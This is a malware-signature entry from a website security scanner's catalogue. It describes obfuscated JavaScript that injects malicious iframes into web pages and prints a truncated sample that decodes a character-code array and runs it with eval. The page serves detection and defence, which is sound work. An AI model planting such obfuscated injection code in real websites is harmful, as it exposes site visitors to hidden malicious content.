SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.encrypted_iframe_injection

malware.encrypted_iframe_injection

Description:
Obfuscated code that injects malicious iframes into a web page.

There are many different ways to obfuscate code that injects iframes. For example:

try{1-​prototype;}catch(​bsdtwbd){q=412;}
if(020=​=0x10){f=[​94,108,100,91,107,95,103,101,22,94,105,...skipped...,94,105,99,57,91,90,51];}if(window.document)e=​eval​;w=f;s=[];r=String.​fromCharCode;for(i=0;-i+283!=0;i+=1){j=i;if(​e)s=s+r((w[j]*1+(8+e("j"+"%3"))));}
if(q&&f&&012===10)e​(s);

Affecting: Any web site (no specific target).

This kind of malware was very popular back in 2008-2012 when the main infection vector was compromised FTP credentials